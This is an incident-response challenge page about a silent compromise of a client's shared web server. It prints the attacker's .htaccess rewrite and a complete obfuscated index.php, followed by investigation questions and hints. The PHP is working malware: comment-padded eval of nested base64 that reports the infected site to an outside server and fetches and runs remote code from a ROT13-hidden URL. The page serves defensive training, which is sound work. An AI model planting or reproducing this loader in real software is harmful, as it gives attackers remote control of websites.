all site content is being moved over to EJMEDIA.CA - please visit us there!

The Blank page enigma

Uncovering a Silent Web Server Compromise

This challenge is presented largely as a replica of a cybersecurity incident I was asked to investigate and resolve earlier this year (2024). The background and initial report below is largely identical to what was presented to me when I was given a call to see if I could take a new client and help them out with this situation. The evidence files are REAL.

THE CHALLENGE

Background

A client has reported that all of their websites hosted on a shared server are displaying white/blank pages instead of the expected content. The client is unable to access their websites' functionality.

Initial Client Report

The client noticed all websites on their shared hosting environment suddenly started returning blank pages.
No specific error messages are displayed, even when visiting the websites directly.
The client can still access the server via FTP and reports they have not done any updates to any files recently aside from adding new blog posts like they do regularly (through their WordPress admin site which can no longer be accessed either)
They also report their host recently shut them down due to excess bandwidth utilisation, but they paid extra to bring it back to a running state, but web pages are still blank.
The client has no idea how to find log files or send them to you. Regardless, when log files do get found, there is no evidence of anything unusual in them.

Notes:

Although some readers may not be familiar with web servers and PHP code, this should not deter you. You’re a cybersecurity analyst who’s been given an incident which is a potential breach of some sort. Your job is to investigate to the best of your abilities!

The server directories & Evidence Files:

The following two files were updated in EVERY directory on the clients web server. Not just public facing directories but EVERY directory. Same date & time stamp (within seconds). The files were identical to what is shown below, however in some cases, pre-existing index.php files were prepended with the index.php code below.

Note: On a web server, ‘index’ named files are largely called first in a directory. Example, if I access erniejohnson.ca the web server is looking for an ‘index’ file - it might be index.html (generally the first choice), index.htm, index.php, etc.

Evidence Files (safe to download and investigate).

DO NOT RUN the index.php unless you're in a sandboxed environment.

You do NOT need to run it to complete the investigation.

.htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

index.php

<?php /*-fN.m}<Xl+-*/error_reporting(0); /*-&@0D!z>P.v-*/eval/*-6I@QKrX$i,nT2:Gji~Q4MxqKUbYYx4-*/(/*-y>5+K)2-*/base64_decode/*-[aSeAV-*/(/*-`#.{Yi#)m-*/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95Qmxjbkp2Y2w5eVpYQnZjblJwYm1jb01DazdEUXB6WlhOemFXOXVYM04wWVhKMEtDazdEUW9rWVdNZ1BTQWtYMUpGVVZWRlUxUmJKMkZqSjEwN0RRcHBaaWdoWlcxd2RIa29KR0ZqS1NsN0RRb2dJQ0FnSkY5VFJWTlRTVTlPV3lkaFl5ZGRJRDBnSkdGak93MEtmV1ZzYzJWN0RRb2dJQ0FnSkhWeWJDQTlJQ2hwYzNObGRDZ2tYMU5GVWxaRlVsc25TRlJVVUZNblhTa2dKaVlnSkY5VFJWSldSVkpiSjBoVVZGQlRKMTBnUFQwOUlDZHZiaWNnUHlBaWFIUjBjSE1pSURvZ0ltaDBkSEFpS1NBdUlDSTZMeThrWDFORlVsWkZVbHRJVkZSUVgwaFBVMVJkSkY5VFJWSldSVkpiVWtWUlZVVlRWRjlWVWtsZElqc05DaUFnSUNCd2IzTjBYM1VvYW5OdmJsOWxibU52WkdVb1lYSnlZWGtvSjNkbFlpYzlQaVIxY213cEtTazdEUXA5RFFva1lTQTlJR2RsZEY5MUtITjBjbDl5YjNReE15Z25kV2RuWXpvdkwycG1aSFF1ZDJOcGJuQnVaM1ppWVM1d1lub3ZaWEo2WW1keUwzRmlZbVV2SnlrdUpHRmpMaWN1ZEhoMEp5azdEUXBsZG1Gc0tDYy9QaWNnTGlBa1lTazdEUW9OQ21aMWJtTjBhVzl1SUdkbGRGOTFLQ1IxY213cElIc05DaUFnSUNCcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDZGpkWEpzWDJWNFpXTW5LU2tnZXcwS0lDQWdJQ0FnSUNBa1kyOXViaUE5SUdOMWNteGZhVzVwZENna2RYSnNLVHNOQ2lBZ0lDQWdJQ0FnWTNWeWJGOXpaWFJ2Y0hRb0pHTnZibTRzSUVOVlVreFBVRlJmVWtWVVZWSk9WRkpCVGxOR1JWSXNJREVwT3cwS0lDQWdJQ0FnSUNCamRYSnNYM05sZEc5d2RDZ2tZMjl1Yml3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb2dJQ0FnSUNBZ0lHTjFjbXhmYzJWMGIzQjBLQ1JqYjI1dUxDQkRWVkpNVDFCVVgxTlRURjlXUlZKSlJsbFFSVVZTTENBd0tUc05DaUFnSUNBZ0lDQWdZM1Z5YkY5elpYUnZjSFFvSkdOdmJtNHNJRU5WVWt4UFVGUmZVMU5NWDFaRlVrbEdXVWhQVTFRc0lEQXBPdzBLSUNBZ0lDQWdJQ0FrWkdGMFlTQTlJR04xY214ZlpYaGxZeWdrWTI5dWJpazdEUW9nSUNBZ0lDQWdJR04xY214ZlkyeHZjMlVvSkdOdmJtNHBPdzBLSUNBZ0lIMGdaV3h6WldsbUlDaG1kVzVqZEdsdmJsOWxlR2x6ZEhNb0oyWnBiR1ZmWjJWMFgyTnZiblJsYm5Sekp5a3BJSHNOQ2lBZ0lDQWdJQ0FnSkdSaGRHRWdQU0JtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdrZFhKc0tUc05DaUFnSUNCOUlHVnNjMlZwWmlBb1puVnVZM1JwYjI1ZlpYaHBjM1J6S0NkbWIzQmxiaWNwSUNZbUlHWjFibU4wYVc5dVgyVjRhWE4wY3lnbmMzUnlaV0Z0WDJkbGRGOWpiMjUwWlc1MGN5Y3BLU0I3RFFvZ0lDQWdJQ0FnSUNSb1lXNWtiR1VnUFNCbWIzQmxiaWdrZFhKc0xDQWljaUlwT3cwS0lDQWdJQ0FnSUNBa1pHRjBZU0E5SUhOMGNtVmhiVjluWlhSZlkyOXVkR1Z1ZEhNb0pHaGhibVJzWlNrN0RRb2dJQ0FnSUNBZ0lHWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNpQWdJQ0I5SUdWc2MyVWdldzBLSUNBZ0lDQWdJQ0FrWkdGMFlTQTlJR1poYkhObE93MEtJQ0FnSUgwTkNpQWdJQ0J5WlhSMWNtNGdKR1JoZEdFN0RRcDlEUW9OQ21aMWJtTjBhVzl1SUhCdmMzUmZkU2drYW5OdmJrUmhkR0VwZXcwS0lDQWdJQ1IxY213Z1BTQW5hSFIwY0RvdkwyaHJibmh2WlM1aWVXaHZkQzUwYjNBdmFXNWtaWGd1Y0dod0p6c05DaUFnSUNBa1kyZ2dQU0JqZFhKc1gybHVhWFFvSkhWeWJDazdEUW9nSUNBZ1kzVnliRjl6WlhSdmNIUW9KR05vTENCRFZWSk1UMUJVWDBOVlUxUlBUVkpGVVZWRlUxUXNJQ0pRVDFOVUlpazdEUW9nSUNBZ1kzVnliRjl6WlhSdmNIUW9KR05vTENCRFZWSk1UMUJVWDFCUFUxUkdTVVZNUkZNc0lDUnFjMjl1UkdGMFlTazdEUW9nSUNBZ1kzVnliRjl6WlhSdmNIUW9KR05vTENCRFZWSk1UMUJVWDFKRlZGVlNUbFJTUVU1VFJrVlNMQ0IwY25WbEtUc05DaUFnSUNCamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmU0ZSVVVFaEZRVVJGVWl3Z1d3MEtJQ0FnSUNBZ0lDQW5RMjl1ZEdWdWRDMVVlWEJsT2lCaGNIQnNhV05oZEdsdmJpOXFjMjl1Snl3TkNpQWdJQ0FnSUNBZ0owTnZiblJsYm5RdFRHVnVaM1JvT2lBbklDNGdjM1J5YkdWdUtDUnFjMjl1UkdGMFlTa3NEUW9nSUNBZ1hTazdEUW9nSUNBZ0pISmxjM0J2Ym5ObElEMGdZM1Z5YkY5bGVHVmpLQ1JqYUNrN0RRb2dJQ0FnWTNWeWJGOWpiRzl6WlNna1kyZ3BPdzBLZlNBL1BnPT0iKSk7"/*-a{G_2oeQdV-*/)/*-MM<SzuG9]-*/);?>

(as a note, the index.php file shown above is considered one continuous line when opening into a text/code editor like Sublime text or VSCode).

Scenario Investigation

What is this index.php doing?
- Can you simulate some examples?
How is this .htaccess file involved?
What are your discovered IoC’s?
What tools did you use?
What type of attack is this?
Is there more you can ascertain about the attacker? Is there a C2 server?
Given the limited information available, how do we deal with the ‘mess’ this has created?

HINTS

HINT 01

The biggest hint I can first give is that inside of code - be it PHP, Python, C++, etc., "comments" can exist in the code. These comments are ingorned by the code interpreter or compiler rendering them pointless other than to human readers of that code. I'm hoping that gets you moving along if you're completely stuck looking at this. Unneccesary comments often are used to obscure legitimate code.

HINT 02

In PHP, code comments start with /* and end with */

HINT 03

In PHP, eval is a way to execute other PHP commands that are supplied into the eval() function

HINT 04

Ok, now I'm practically giving it away ;)
What do you think is happening here?
base64_decode

HINT 05

There is another type of obfuscation / encryption occuring in the PHP file. It's a pretty simple form of encryption.

HINT 06

You need more?
Well, sorry, you're out of luck for now, I haven't written any more hints yet!

the solution

solution coming soon

More Challenges Here!

Page updated

Google Sites

Report abuse